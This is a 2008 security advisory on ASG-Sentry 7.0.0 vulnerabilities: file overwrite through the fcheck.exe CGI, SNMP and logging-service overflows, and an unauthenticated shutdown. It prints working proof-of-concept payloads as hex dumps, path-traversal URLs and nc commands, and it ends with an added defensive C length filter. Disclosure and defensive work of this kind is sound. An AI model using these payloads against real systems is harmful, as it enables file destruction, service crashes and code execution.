
| Subject: | [NEWS] ASG-Sentry Multiple Vulnerabilities |
|---|---|
| Date: | 12 Mar 2008 09:58:17 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

ASG-Sentry Multiple Vulnerabilities
------------------------------------------------------------------------

SUMMARY

"The <http://www.asg-sentry.com> ASG-Sentry family of products is a suite of tools strategically engineered to control, monitor, manage, and enhance your network. Sentry's tools provide you with full visibility to your network from any Web browser. Sentry also allows you to fully instrument your company's applications, CPUs, disk space, memory, files, Windows and UNIX platforms, and more."

Multiple vulnerabilities have been discovered in ASG-Sentry. They allow remote attackers to make the product delete arbitrary files, to crash the product, and to overflow an internal buffer, allowing the execution of arbitrary code.

DETAILS

Vulnerable Systems:

 * ASG-Sentry version 7.0.0

Arbitrary files deletion

The fcheck.exe (File Check Utility) CGI available in ASG is used for handling index files which contain a list of filenames and checksums. The -b option of this utility creates these index files, and it is possible to specify both the name of the output file and, optionally, the folder which will be scanned recursively to find and read the files to add to the list.

The first vulnerability is that an external attacker can use this CGI to overwrite existing files with no data (by specifying a new folder, which will be created by the same program) or with the list of filenames described above. Naturally, it is possible to specify files both on the local disks and on network shares.

The second effect is that CPU and disk can be occupied by the scanning of every file on the disk, simply by specifying, for example, c:\ as the folder.

Heap-overflow in FxAgent

The FxAgent process running on UDP port 6161 is used for handling the various SNMP requests. A community field longer than 64 bytes can be used by an attacker to exploit a heap-overflow.

Termination of FxIAList

FxIAList is a service which runs on TCP port 6162 and is used for the logging operations, which include the commands "exit", "trace on", "verbose", "trace off" and the name of the log file to create (xxxx.xx.xx) and its content. The main problem is that the server doesn't require authentication, so anyone can send the "exit" command and the service will just terminate.

Buffer overflow in FxIAList

The same service is also affected by a stack-based buffer-overflow, which happens when the data to be written to the log file (max 1023 bytes) is copied into a buffer of only 500 bytes.

Exploits:

asgulo_fxagent.txt:

    0000000 2330 0102 0400 41ff 4141 4141 4141 4141
    0000010 4141 4141 4141 4141 4141 4141 4141 4141
    *
    0000100 4141 4141 4141 16a1 0102 0236 0001 0102
    0000110 3000 300b 0609 2b05 0106 0102 0005
    000011e

asgulo-ialist1.txt:

    0000000 7865 7469
    0000004

asgulo-ialist2.txt:

    0000000 3231 3433 3635 3837 4141 4141 4141 4141
    0000010 4141 4141 4141 4141 4141 4141 4141 4141
    *
    00003f0 4141 4141 4141 4141 4141 4141 7c41 007c
    00003ff

Arbitrary files deletion

    http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini
    http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\windows\win.ini
    http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\file.txt+c:\
    http://SERVER:6161/snmx-cgi/fcheck.exe?-b+\host\document.txt

The last link, for the network share, is correct because Apache converts any backslash to a double one, so that it becomes \\host\\document.txt

Heap-overflow in FxAgent

    nc SERVER 6161 -v -v -u < asgulo_fxagent.txt

Termination of FxIAList

    nc SERVER 6162 -v -v -w 1 < asgulo-ialist1.txt

Buffer overflow in FxIAList

    nc SERVER 6162 -v -v -w 1 < asgulo-ialist2.txt

ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@autistici.org> Luigi Auriemma.
The original article can be found at: <http://aluigi.altervista.org/adv/asgulo-adv.txt> http://aluigi.altervista.org/adv/asgulo-adv.txt
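
The FxAgent issue above depends on an SNMP community field longer than 64 bytes reaching the agent. The following is an added example, not part of the original advisory or of the vendor's code, of a length check that a filtering proxy or sensor in front of UDP port 6161 could apply before forwarding a datagram. It assumes standard SNMPv1/v2c BER framing; the function names and the sample datagram are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>

#define MAX_COMMUNITY 64   /* community length limit stated in the advisory */

/* Constructed sample: SEQUENCE { version 0, community "public", empty PDU } */
static const uint8_t SAMPLE[] = {
    0x30,0x0d, 0x02,0x01,0x00, 0x04,0x06,'p','u','b','l','i','c', 0xa0,0x00 };

/* Read one BER tag+length at *pos. Returns 0 on success, -1 if malformed. */
static int ber_header(const uint8_t *p, size_t n, size_t *pos,
                      uint8_t want_tag, size_t *len)
{
    if (*pos + 2 > n || p[*pos] != want_tag) return -1;
    uint8_t b = p[*pos + 1];
    *pos += 2;
    if (b < 0x80) {
        *len = b;                          /* short form */
    } else {
        size_t k = b & 0x7f;               /* long form: k length octets */
        if (k == 0 || k > 4 || *pos + k > n) return -1;
        *len = 0;
        while (k--) *len = (*len << 8) | p[(*pos)++];
    }
    return (*len <= n - *pos) ? 0 : -1;    /* value must fit in the datagram */
}

/* Community length, or -1 if the datagram is not well-formed up to and
 * including the community field. */
long snmp_community_len(const uint8_t *pkt, size_t n)
{
    size_t pos = 0, len;
    if (ber_header(pkt, n, &pos, 0x30, &len)) return -1;  /* SEQUENCE  */
    if (ber_header(pkt, n, &pos, 0x02, &len)) return -1;  /* version   */
    pos += len;
    if (ber_header(pkt, n, &pos, 0x04, &len)) return -1;  /* community */
    return (long)len;
}

/* 1 = forward to the agent, 0 = drop (malformed or oversized community). */
int snmp_community_ok(const uint8_t *pkt, size_t n)
{
    long l = snmp_community_len(pkt, n);
    return l >= 0 && l <= MAX_COMMUNITY;
}

int main(void)
{
    printf("community length %ld, forward=%d\n",
           snmp_community_len(SAMPLE, sizeof SAMPLE),
           snmp_community_ok(SAMPLE, sizeof SAMPLE));
    return 0;
}
```

Datagrams that fail to parse are dropped as well, so a length field that does not match the data actually received never reaches the agent.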